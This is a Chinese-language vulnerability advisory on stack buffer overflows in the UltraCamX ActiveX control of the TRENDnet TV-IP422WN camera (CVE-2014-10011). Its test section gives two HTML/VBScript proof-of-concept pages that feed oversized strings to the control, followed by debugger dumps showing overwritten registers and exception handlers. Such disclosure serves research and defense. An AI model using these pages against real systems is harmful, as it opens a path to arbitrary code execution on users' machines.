TRENDnet TV-IP422WN 'UltraCamX.ocx'多个栈缓冲区溢出漏洞
发布日期:2014-11-25
更新日期:2014-11-26
受影响系统:trendnet TV-IP422WN
描述:
BUGTRAQ ID:
71292
CVE(CAN) ID:
CVE-2014-10011
TRENDnet TV-IP422WN是网络摄相机产品。
TRENDnet TV-IP422WN在实现上存在多个栈缓冲区溢出漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意代码。
<*来源:Gjoko Krstic (
liquidworm@gmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target'
/>
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraCamLib.UltraCamX"
argCount = 1
thricer=String(8212, "A")
target.SnapFileName = thricer
</script>
</html>
--
eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4
edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0 nv up ei pl nz na
pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861 movzx ecx,byte ptr [eax+61h]
ds:002b:414141a2=??
--
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target'
/>
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Function OpenFileDlg ( ByVal sFilter As String ) As
String"
memberName = "OpenFileDlg"
progid = "UltraCamLib.UltraCamX"
argCount = 1
thricer=String(2068, "A")
target.OpenFileDlg thricer
</script>
</html>
--
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c
edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac
po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h]
ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
--
建议:
厂商补丁:
trendnet
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.trendnet.com/support/supportdetail.asp?prod=190_TV-IP422WN浏览次数:2126
严重程度:0(网友投票)